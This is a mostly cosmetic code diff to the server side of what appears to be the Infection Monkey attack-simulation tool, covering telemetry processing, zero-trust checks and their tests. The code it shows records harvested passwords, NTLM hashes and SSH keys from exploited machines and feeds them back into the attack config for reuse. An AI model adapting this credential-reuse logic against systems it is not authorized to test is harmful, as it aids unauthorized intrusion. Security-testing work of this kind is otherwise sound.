--- a/monkey/monkey_island/cc/services/representations_test.py
+++ b/monkey/monkey_island/cc/services/representations_test.py
@@ -12,35 +12,35 @@ class TestJsonRepresentations(TestCase):
self.assertEqual({}, normalize_obj({}))
# no special content
- self.assertEqual({"a": "a"}, normalize_obj({"a": "a"}))
+ self.assertEqual({"a":"a"}, normalize_obj({"a":"a"}))
# _id field -> id field
- self.assertEqual({"id": 12345}, normalize_obj({"_id": 12345}))
+ self.assertEqual({"id":12345}, normalize_obj({"_id":12345}))
# obj id field -> str
obj_id_str = "123456789012345678901234"
self.assertEqual(
- {"id": obj_id_str}, normalize_obj({"_id": bson.objectid.ObjectId(obj_id_str)})
+ {"id":obj_id_str}, normalize_obj({"_id":bson.objectid.ObjectId(obj_id_str)})
)
# datetime -> str
dt = datetime.now()
- expected = {"a": str(dt)}
- result = normalize_obj({"a": dt})
+ expected = {"a":str(dt)}
+ result = normalize_obj({"a":dt})
self.assertEqual(expected, result)
# dicts and lists
self.assertEqual(
- {"a": [{"ba": obj_id_str, "bb": obj_id_str}], "b": {"id": obj_id_str}},
- normalize_obj(
- {
- "a": [
+ {"a":[{"ba":obj_id_str, "bb":obj_id_str}], "b":{"id":obj_id_str}},
+ normalize_obj(
{
- "ba": bson.objectid.ObjectId(obj_id_str),
- "bb": bson.objectid.ObjectId(obj_id_str),
+ "a":[
+ {
+ "ba":bson.objectid.ObjectId(obj_id_str),
+ "bb":bson.objectid.ObjectId(obj_id_str),
+ }
+ ],
+ "b":{"_id":bson.objectid.ObjectId(obj_id_str)},
}
- ],
- "b": {"_id": bson.objectid.ObjectId(obj_id_str)},
- }
- ),
+ ),
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/exploit.py b/monkey/monkey_island/cc/services/telemetry/processing/exploit.py
index 6eb759b21..d3c5cb37a 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/exploit.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/exploit.py
@@ -23,11 +23,11 @@ def process_exploit_telemetry(telemetry_json):
add_exploit_extracted_creds_to_config(telemetry_json)
check_machine_exploited(
- current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]),
- exploit_successful=telemetry_json["data"]["result"],
- exploiter=telemetry_json["data"]["exploiter"],
- target_ip=telemetry_json["data"]["machine"]["ip_addr"],
- timestamp=telemetry_json["timestamp"],
+ current_monkey=Monkey.get_single_monkey_by_guid(telemetry_json["monkey_guid"]),
+ exploit_successful=telemetry_json["data"]["result"],
+ exploiter=telemetry_json["data"]["exploiter"],
+ target_ip=telemetry_json["data"]["machine"]["ip_addr"],
+ timestamp=telemetry_json["timestamp"],
)
@@ -47,7 +47,7 @@ def add_exploit_extracted_creds_to_config(telemetry_json):
def update_node_credentials_from_successful_attempts(edge: EdgeService, telemetry_json):
for attempt in telemetry_json["data"]["attempts"]:
if attempt["result"]:
- found_creds = {"user": attempt["user"]}
+ found_creds = {"user":attempt["user"]}
for field in ["password", "lm_hash", "ntlm_hash", "ssh_key"]:
if len(attempt[field]) != 0:
found_creds[field] = attempt[field]
@@ -56,10 +56,10 @@ def update_node_credentials_from_successful_attempts(edge: EdgeService, telemetr
def update_network_with_exploit(edge: EdgeService, telemetry_json):
telemetry_json["data"]["info"]["started"] = dateutil.parser.parse(
- telemetry_json["data"]["info"]["started"]
+ telemetry_json["data"]["info"]["started"]
)
telemetry_json["data"]["info"]["finished"] = dateutil.parser.parse(
- telemetry_json["data"]["info"]["finished"]
+ telemetry_json["data"]["info"]["finished"]
)
new_exploit = copy.deepcopy(telemetry_json["data"])
new_exploit.pop("machine")
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
index be7b6e7ea..7ccbb2e96 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/post_breach.py
@@ -18,7 +18,7 @@ def process_communicate_as_new_user_telemetry(telemetry_json):
POST_BREACH_TELEMETRY_PROCESSING_FUNCS = {
- POST_BREACH_COMMUNICATE_AS_NEW_USER: process_communicate_as_new_user_telemetry,
+ POST_BREACH_COMMUNICATE_AS_NEW_USER:process_communicate_as_new_user_telemetry,
}
@@ -55,5 +55,5 @@ def process_post_breach_telemetry(telemetry_json):
def update_data(telemetry_json, data):
mongo.db.monkey.update(
- {"guid": telemetry_json["monkey_guid"]}, {"$push": {"pba_results": data}}
+ {"guid":telemetry_json["monkey_guid"]}, {"$push":{"pba_results":data}}
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py
index 667928d3c..8a3bc9b78 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py
@@ -12,16 +12,16 @@ from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel
logger = logging.getLogger(__name__)
TELEMETRY_CATEGORY_TO_PROCESSING_FUNC = {
- TelemCategoryEnum.TUNNEL: process_tunnel_telemetry,
- TelemCategoryEnum.STATE: process_state_telemetry,
- TelemCategoryEnum.EXPLOIT: process_exploit_telemetry,
- TelemCategoryEnum.SCAN: process_scan_telemetry,
- TelemCategoryEnum.SYSTEM_INFO: process_system_info_telemetry,
- TelemCategoryEnum.POST_BREACH: process_post_breach_telemetry,
- TelemCategoryEnum.SCOUTSUITE: process_scoutsuite_telemetry,
+ TelemCategoryEnum.TUNNEL:process_tunnel_telemetry,
+ TelemCategoryEnum.STATE:process_state_telemetry,
+ TelemCategoryEnum.EXPLOIT:process_exploit_telemetry,
+ TelemCategoryEnum.SCAN:process_scan_telemetry,
+ TelemCategoryEnum.SYSTEM_INFO:process_system_info_telemetry,
+ TelemCategoryEnum.POST_BREACH:process_post_breach_telemetry,
+ TelemCategoryEnum.SCOUTSUITE:process_scoutsuite_telemetry,
# `lambda *args, **kwargs: None` is a no-op.
- TelemCategoryEnum.TRACE: lambda *args, **kwargs: None,
- TelemCategoryEnum.ATTACK: lambda *args, **kwargs: None,
+ TelemCategoryEnum.TRACE:lambda *args, **kwargs:None,
+ TelemCategoryEnum.ATTACK:lambda *args, **kwargs:None,
}
@@ -34,5 +34,5 @@ def process_telemetry(telemetry_json):
logger.info("Got unknown type of telemetry: %s" % telem_category)
except Exception as ex:
logger.error(
- "Exception caught while processing telemetry. Info: {}".format(ex), exc_info=True
+ "Exception caught while processing telemetry. Info: {}".format(ex), exc_info=True
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/scan.py b/monkey/monkey_island/cc/services/telemetry/processing/scan.py
index 764cd3044..194797a98 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/scan.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/scan.py
@@ -25,16 +25,16 @@ def update_edges_and_nodes_based_on_scan_telemetry(telemetry_json):
edge = get_edge_by_scan_or_exploit_telemetry(telemetry_json)
edge.update_based_on_scan_telemetry(telemetry_json)
- node = mongo.db.node.find_one({"_id": edge.dst_node_id})
+ node = mongo.db.node.find_one({"_id":edge.dst_node_id})
if node is not None:
scan_os = telemetry_json["data"]["machine"]["os"]
if "type" in scan_os:
mongo.db.node.update(
- {"_id": node["_id"]}, {"$set": {"os.type": scan_os["type"]}}, upsert=False
+ {"_id":node["_id"]}, {"$set":{"os.type":scan_os["type"]}}, upsert=False
)
if "version" in scan_os:
mongo.db.node.update(
- {"_id": node["_id"]}, {"$set": {"os.version": scan_os["version"]}}, upsert=False
+ {"_id":node["_id"]}, {"$set":{"os.version":scan_os["version"]}}, upsert=False
)
label = NodeService.get_label_for_endpoint(node["_id"])
edge.update_label(node["_id"], label)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py b/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py
index 5f2677bcb..2584179fa 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/scoutsuite.py
@@ -34,5 +34,5 @@ def create_scoutsuite_findings(cloud_services: dict):
def update_data(telemetry_json):
mongo.db.scoutsuite.insert_one(
- {"guid": telemetry_json["monkey_guid"]}, {"results": telemetry_json["data"]}
+ {"guid":telemetry_json["monkey_guid"]}, {"results":telemetry_json["data"]}
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/state.py b/monkey/monkey_island/cc/services/telemetry/processing/state.py
index 8749cc730..3ab6430ef 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/state.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/state.py
@@ -23,5 +23,6 @@ def process_state_telemetry(telemetry_json):
if telemetry_json["data"]["version"]:
logger.info(
- f"monkey {telemetry_json['monkey_guid']} has version {telemetry_json['data']['version']}"
+ f"monkey {telemetry_json['monkey_guid']} has version "
+ f"{telemetry_json['data']['version']}"
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info.py
index 3313b763d..a0a16d72c 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/system_info.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info.py
@@ -3,7 +3,8 @@ import logging
from monkey_island.cc.server_utils.encryptor import get_encryptor
from monkey_island.cc.services.config import ConfigService
from monkey_island.cc.services.node import NodeService
-from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import (
+from monkey_island.cc.services.telemetry.processing.system_info_collectors\
+ .system_info_telemetry_dispatcher import (
SystemInfoTelemetryDispatcher,
)
from monkey_island.cc.services.wmi_handler import WMIHandler
@@ -20,7 +21,8 @@ def process_system_info_telemetry(telemetry_json):
dispatcher.dispatch_collector_results_to_relevant_processors,
]
- # Calling safe_process_telemetry so if one of the stages fail, we log and move on instead of failing the rest of
+ # Calling safe_process_telemetry so if one of the stages fail, we log and move on instead of
+ # failing the rest of
# them, as they are independent.
for stage in telemetry_processing_stages:
safe_process_telemetry(stage, telemetry_json)
@@ -32,10 +34,10 @@ def safe_process_telemetry(processing_function, telemetry_json):
processing_function(telemetry_json)
except Exception as err:
logger.error(
- "Error {} while in {} stage of processing telemetry.".format(
- str(err), processing_function.__name__
- ),
- exc_info=True,
+ "Error {} while in {} stage of processing telemetry.".format(
+ str(err), processing_function.__name__
+ ),
+ exc_info=True,
)
@@ -44,7 +46,8 @@ def process_ssh_info(telemetry_json):
ssh_info = telemetry_json["data"]["ssh_info"]
encrypt_system_info_ssh_keys(ssh_info)
if telemetry_json["data"]["network_info"]["networks"]:
- # We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
+ # We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip
+ # from telemetry
add_ip_to_ssh_keys(telemetry_json["data"]["network_info"]["networks"][0], ssh_info)
add_system_info_ssh_keys_to_config(ssh_info)
@@ -55,7 +58,7 @@ def add_system_info_ssh_keys_to_config(ssh_info):
# Public key is useless without private key
if user["public_key"] and user["private_key"]:
ConfigService.ssh_add_keys(
- user["public_key"], user["private_key"], user["name"], user["ip"]
+ user["public_key"], user["private_key"], user["name"], user["ip"]
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py
index 0fae438d4..c188db97d 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/aws.py
@@ -13,5 +13,6 @@ def process_aws_telemetry(collector_results, monkey_guid):
relevant_monkey.aws_instance_id = instance_id
relevant_monkey.save()
logger.debug(
- "Updated Monkey {} with aws instance id {}".format(str(relevant_monkey), instance_id)
+ "Updated Monkey {} with aws instance id {}".format(str(relevant_monkey),
+ instance_id)
)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py
index 894bdce75..adb8d5f33 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/system_info_telemetry_dispatcher.py
@@ -23,17 +23,18 @@ from monkey_island.cc.services.telemetry.zero_trust_checks.antivirus_existence i
logger = logging.getLogger(__name__)
SYSTEM_INFO_COLLECTOR_TO_TELEMETRY_PROCESSORS = {
- AWS_COLLECTOR: [process_aws_telemetry],
- ENVIRONMENT_COLLECTOR: [process_environment_telemetry],
- HOSTNAME_COLLECTOR: [process_hostname_telemetry],
- PROCESS_LIST_COLLECTOR: [check_antivirus_existence],
+ AWS_COLLECTOR:[process_aws_telemetry],
+ ENVIRONMENT_COLLECTOR:[process_environment_telemetry],
+ HOSTNAME_COLLECTOR:[process_hostname_telemetry],
+ PROCESS_LIST_COLLECTOR:[check_antivirus_existence],
}
class SystemInfoTelemetryDispatcher(object):
def __init__(
- self,
- collector_to_parsing_functions: typing.Mapping[str, typing.List[typing.Callable]] = None,
+ self,
+ collector_to_parsing_functions: typing.Mapping[
+ str, typing.List[typing.Callable]] = None,
):
"""
:param collector_to_parsing_functions: Map between collector names and a list of functions
@@ -47,7 +48,8 @@ class SystemInfoTelemetryDispatcher(object):
def dispatch_collector_results_to_relevant_processors(self, telemetry_json):
"""
- If the telemetry has collectors' results, dispatches the results to the relevant processing functions.
+ If the telemetry has collectors' results, dispatches the results to the relevant
+ processing functions.
:param telemetry_json: Telemetry sent from the Monkey
"""
if "collectors" in telemetry_json["data"]:
@@ -58,11 +60,11 @@ class SystemInfoTelemetryDispatcher(object):
for collector_name, collector_results in telemetry_json["data"]["collectors"].items():
self.dispatch_result_of_single_collector_to_processing_functions(
- collector_name, collector_results, relevant_monkey_guid
+ collector_name, collector_results, relevant_monkey_guid
)
def dispatch_result_of_single_collector_to_processing_functions(
- self, collector_name, collector_results, relevant_monkey_guid
+ self, collector_name, collector_results, relevant_monkey_guid
):
if collector_name in self.collector_to_processing_functions:
for processing_function in self.collector_to_processing_functions[collector_name]:
@@ -71,10 +73,10 @@ class SystemInfoTelemetryDispatcher(object):
processing_function(collector_results, relevant_monkey_guid)
except Exception as e:
logger.error(
- "Error {} while processing {} system info telemetry".format(
- str(e), collector_name
- ),
- exc_info=True,
+ "Error {} while processing {} system info telemetry".format(
+ str(e), collector_name
+ ),
+ exc_info=True,
)
else:
logger.warning("Unknown system info collector name: {}".format(collector_name))
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py
index f1e53d5f4..e392a3601 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_environment.py
@@ -1,7 +1,8 @@
import uuid
from monkey_island.cc.models import Monkey
-from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import (
+from monkey_island.cc.services.telemetry.processing.system_info_collectors\
+ .system_info_telemetry_dispatcher import (
SystemInfoTelemetryDispatcher,
)
@@ -16,12 +17,12 @@ class TestEnvironmentTelemetryProcessing:
on_premise = "On Premise"
telem_json = {
- "data": {
- "collectors": {
- "EnvironmentCollector": {"environment": on_premise},
+ "data":{
+ "collectors":{
+ "EnvironmentCollector":{"environment":on_premise},
}
},
- "monkey_guid": monkey_guid,
+ "monkey_guid":monkey_guid,
}
dispatcher.dispatch_collector_results_to_relevant_processors(telem_json)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py
index 0335c6e65..24e928818 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/system_info_collectors/test_system_info_telemetry_dispatcher.py
@@ -3,19 +3,19 @@ import uuid
import pytest
from monkey_island.cc.models import Monkey
-from monkey_island.cc.services.telemetry.processing.system_info_collectors.system_info_telemetry_dispatcher import (
+from monkey_island.cc.services.telemetry.processing.system_info_collectors\
+ .system_info_telemetry_dispatcher import (
SystemInfoTelemetryDispatcher,
process_aws_telemetry,
)
TEST_SYS_INFO_TO_PROCESSING = {
- "AwsCollector": [process_aws_telemetry],
+ "AwsCollector":[process_aws_telemetry],
}
class TestSystemInfoTelemetryDispatcher:
def test_dispatch_to_relevant_collector_bad_inputs(self):
-
dispatcher = SystemInfoTelemetryDispatcher(TEST_SYS_INFO_TO_PROCESSING)
# Bad format telem JSONs - throws
@@ -23,19 +23,19 @@ class TestSystemInfoTelemetryDispatcher:
with pytest.raises(KeyError):
dispatcher.dispatch_collector_results_to_relevant_processors(bad_empty_telem_json)
- bad_no_data_telem_json = {"monkey_guid": "bla"}
+ bad_no_data_telem_json = {"monkey_guid":"bla"}
with pytest.raises(KeyError):
dispatcher.dispatch_collector_results_to_relevant_processors(bad_no_data_telem_json)
- bad_no_monkey_telem_json = {"data": {"collectors": {"AwsCollector": "Bla"}}}
+ bad_no_monkey_telem_json = {"data":{"collectors":{"AwsCollector":"Bla"}}}
with pytest.raises(KeyError):
dispatcher.dispatch_collector_results_to_relevant_processors(bad_no_monkey_telem_json)
# Telem JSON with no collectors - nothing gets dispatched
- good_telem_no_collectors = {"monkey_guid": "bla", "data": {"bla": "bla"}}
+ good_telem_no_collectors = {"monkey_guid":"bla", "data":{"bla":"bla"}}
good_telem_empty_collectors = {
- "monkey_guid": "bla",
- "data": {"bla": "bla", "collectors": {}},
+ "monkey_guid":"bla",
+ "data":{"bla":"bla", "collectors":{}},
}
dispatcher.dispatch_collector_results_to_relevant_processors(good_telem_no_collectors)
@@ -50,12 +50,12 @@ class TestSystemInfoTelemetryDispatcher:
# JSON with results - make sure functions are called
instance_id = "i-0bd2c14bd4c7d703f"
telem_json = {
- "data": {
- "collectors": {
- "AwsCollector": {"instance_id": instance_id},
+ "data":{
+ "collectors":{
+ "AwsCollector":{"instance_id":instance_id},
}
},
- "monkey_guid": a_monkey.guid,
+ "monkey_guid":a_monkey.guid,
}
dispatcher.dispatch_collector_results_to_relevant_processors(telem_json)
diff --git a/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py b/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py
index 882339119..2177c3ae6 100644
--- a/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py
+++ b/monkey/monkey_island/cc/services/telemetry/processing/test_post_breach.py
@@ -5,65 +5,65 @@ import monkey_island.cc.services.telemetry.processing.post_breach as post_breach
from .post_breach import EXECUTION_WITHOUT_OUTPUT
original_telem_multiple_results = {
- "data": {
- "command": "COMMAND",
- "hostname": "HOST",
- "ip": "127.0.1.1",
- "name": "PBA NAME",
- "result": [["SUCCESSFUL", True], ["UNSUCCESFUL", False], ["", True]],
+ "data":{
+ "command":"COMMAND",
+ "hostname":"HOST",
+ "ip":"127.0.1.1",
+ "name":"PBA NAME",
+ "result":[["SUCCESSFUL", True], ["UNSUCCESFUL", False], ["", True]],
},
- "telem_category": "post_breach",
+ "telem_category":"post_breach",
}
expected_telem_multiple_results = {
- "data": [
+ "data":[
{
- "command": "COMMAND",
- "hostname": "HOST",
- "ip": "127.0.1.1",
- "name": "PBA NAME",
- "result": ["SUCCESSFUL", True],
+ "command":"COMMAND",
+ "hostname":"HOST",
+ "ip":"127.0.1.1",
+ "name":"PBA NAME",
+ "result":["SUCCESSFUL", True],
},
{
- "command": "COMMAND",
- "hostname": "HOST",
- "ip": "127.0.1.1",
- "name": "PBA NAME",
- "result": ["UNSUCCESFUL", False],
+ "command":"COMMAND",
+ "hostname":"HOST",
+ "ip":"127.0.1.1",
+ "name":"PBA NAME",
+ "result":["UNSUCCESFUL", False],
},
{
- "command": "COMMAND",
- "hostname": "HOST",
- "ip": "127.0.1.1",
- "name": "PBA NAME",
- "result": [EXECUTION_WITHOUT_OUTPUT, True],
+ "command":"COMMAND",
+ "hostname":"HOST",
+ "ip":"127.0.1.1",
+ "name":"PBA NAME",
+ "result":[EXECUTION_WITHOUT_OUTPUT, True],
},
],
- "telem_category": "post_breach",
+ "telem_category":"post_breach",
}
original_telem_single_result = {
- "data": {
- "command": "COMMAND",
- "hostname": "HOST",
- "ip": "127.0.1.1",
- "name": "PBA NAME",
- "result": ["", True],
+ "data":{
+ "command":"COMMAND",
+ "hostname":"HOST",
+ "ip":"127.0.1.1",
+ "name":"PBA NAME",
+ "result":["", True],
},
- "telem_category": "post_breach",
+ "telem_category":"post_breach",
}
expected_telem_single_result = {
- "data": [
+ "data":[
{
- "command": "COMMAND",
- "hostname": "HOST",
- "ip": "127.0.1.1",
- "name": "PBA NAME",
- "result": [EXECUTION_WITHOUT_OUTPUT, True],
+ "command":"COMMAND",
+ "hostname":"HOST",
+ "ip":"127.0.1.1",
+ "name":"PBA NAME",
+ "result":[EXECUTION_WITHOUT_OUTPUT, True],
},
],
- "telem_category": "post_breach",
+ "telem_category":"post_breach",
}
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py
index d2f154a9e..7cae75b8f 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/antivirus_existence.py
@@ -15,9 +15,9 @@ def check_antivirus_existence(process_list_json, monkey_guid):
current_monkey = Monkey.get_single_monkey_by_guid(monkey_guid)
process_list_event = Event.create_event(
- title="Process list",
- message="Monkey on {} scanned the process list".format(current_monkey.hostname),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL,
+ title="Process list",
+ message="Monkey on {} scanned the process list".format(current_monkey.hostname),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL,
)
events = [process_list_event]
@@ -25,12 +25,12 @@ def check_antivirus_existence(process_list_json, monkey_guid):
for process in av_processes:
events.append(
- Event.create_event(
- title="Found AV process",
- message="The process '{}' was recognized as an Anti Virus process. Process "
- "details: {}".format(process[1]["name"], json.dumps(process[1])),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL,
- )
+ Event.create_event(
+ title="Found AV process",
+ message="The process '{}' was recognized as an Anti Virus process. Process "
+ "details: {}".format(process[1]["name"], json.dumps(process[1])),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL,
+ )
)
if len(av_processes) > 0:
@@ -38,7 +38,7 @@ def check_antivirus_existence(process_list_json, monkey_guid):
else:
test_status = zero_trust_consts.STATUS_FAILED
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events
+ test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events
)
@@ -49,7 +49,7 @@ def filter_av_processes(process_list):
process_name = process[1]["name"]
# This is for case-insensitive `in`. Generator expression is to save memory.
if process_name.upper() in (
- known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES
+ known_av_name.upper() for known_av_name in ANTI_VIRUS_KNOWN_PROCESS_NAMES
):
av_processes.append(process)
return av_processes
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py
index 74007b5fd..0ea092aa6 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/communicate_as_new_user.py
@@ -5,28 +5,31 @@ from monkey_island.cc.services.zero_trust.monkey_findings.monkey_zt_finding_serv
)
COMM_AS_NEW_USER_FAILED_FORMAT = "Monkey on {} couldn't communicate as new user. Details: {}"
-COMM_AS_NEW_USER_SUCCEEDED_FORMAT = "New user created by Monkey on {} successfully tried to communicate with the internet. Details: {}"
+COMM_AS_NEW_USER_SUCCEEDED_FORMAT = (
+ "New user created by Monkey on {} successfully tried to "
+ "communicate with the internet. Details: {}"
+)
def check_new_user_communication(current_monkey, success, message):
status = zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER,
- status=status,
- events=[
- get_attempt_event(current_monkey),
- get_result_event(current_monkey, message, success),
- ],
+ test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER,
+ status=status,
+ events=[
+ get_attempt_event(current_monkey),
+ get_result_event(current_monkey, message, success),
+ ],
)
def get_attempt_event(current_monkey):
tried_to_communicate_event = Event.create_event(
- title="Communicate as new user",
- message="Monkey on {} tried to create a new user and communicate from it.".format(
- current_monkey.hostname
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ title="Communicate as new user",
+ message="Monkey on {} tried to create a new user and communicate from it.".format(
+ current_monkey.hostname
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
)
return tried_to_communicate_event
@@ -37,7 +40,7 @@ def get_result_event(current_monkey, message, success):
)
return Event.create_event(
- title="Communicate as new user",
- message=message_format.format(current_monkey.hostname, message),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ title="Communicate as new user",
+ message=message_format.format(current_monkey.hostname, message),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
)
diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py
index e4accdff7..a99449981 100644
--- a/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py
+++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_checks/data_endpoints.py
@@ -21,79 +21,82 @@ def check_open_data_endpoints(telemetry_json):
events = [
Event.create_event(
- title="Scan Telemetry",
- message="Monkey on {} tried to perform a network scan, the target was {}.".format(
- current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"]
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- timestamp=telemetry_json["timestamp"],
+ title="Scan Telemetry",
+ message="Monkey on {} tried to perform a network scan, the target was {}.".format(
+ current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"]
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ timestamp=telemetry_json["timestamp"],
)
]
for service_name, service_data in list(services.items()):
events.append(
- Event.create_event(
- title="Scan telemetry analysis",
- message="Scanned service: {}.".format(service_name),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- )
+ Event.create_event(
+ title="Scan telemetry analysis",
+ message="Scanned service: {}.".format(service_name),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ )
)
if service_name in HTTP_SERVERS_SERVICES_NAMES:
found_http_server_status = zero_trust_consts.STATUS_FAILED
events.append(
- Event.create_event(
- title="Scan telemetry analysis",
- message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
- service_data["display_name"],
- telemetry_json["data"]["machine"]["ip_addr"],
- json.dumps(service_data),
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- )
+ Event.create_event(
+ title="Scan telemetry analysis",
+ message="Service {} on {} recognized as an open data endpoint! "
+ "Service details: {}".format(
+ service_data["display_name"],
+ telemetry_json["data"]["machine"]["ip_addr"],
+ json.dumps(service_data),
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ )
)
if service_name == ES_SERVICE:
found_elastic_search_server = zero_trust_consts.STATUS_FAILED
events.append(
- Event.create_event(
- title="Scan telemetry analysis",
- message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
- service_data["display_name"],
- telemetry_json["data"]["machine"]["ip_addr"],
- json.dumps(service_data),
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- )
+ Event.create_event(
+ title="Scan telemetry analysis",
+ message="Service {} on {} recognized as an open data endpoint! "
+ "Service details: {}".format(
+ service_data["display_name"],
+ telemetry_json["data"]["machine"]["ip_addr"],
+ json.dumps(service_data),
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ )
)
if service_name == POSTGRESQL_SERVER_SERVICE_NAME:
found_postgresql_server = zero_trust_consts.STATUS_FAILED
events.append(
- Event.create_event(
- title="Scan telemetry analysis",
- message="Service {} on {} recognized as an open data endpoint! Service details: {}".format(
- service_data["display_name"],
- telemetry_json["data"]["machine"]["ip_addr"],
- json.dumps(service_data),
- ),
- event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
- )
+ Event.create_event(
+ title="Scan telemetry analysis",
+ message="Service {} on {} recognized as an open data endpoint! "
+ "Service details: {}".format(
+ service_data["display_name"],
+ telemetry_json["data"]["machine"]["ip_addr"],
+ json.dumps(service_data),
+ ),
+ event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK,
+ )
)
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP,
- status=found_http_server_status,
- events=events,
+ test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP,
+ status=found_http_server_status,
+ events=events,
)
MonkeyZTFindingService.create_or_add_to_existing(
- test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC,
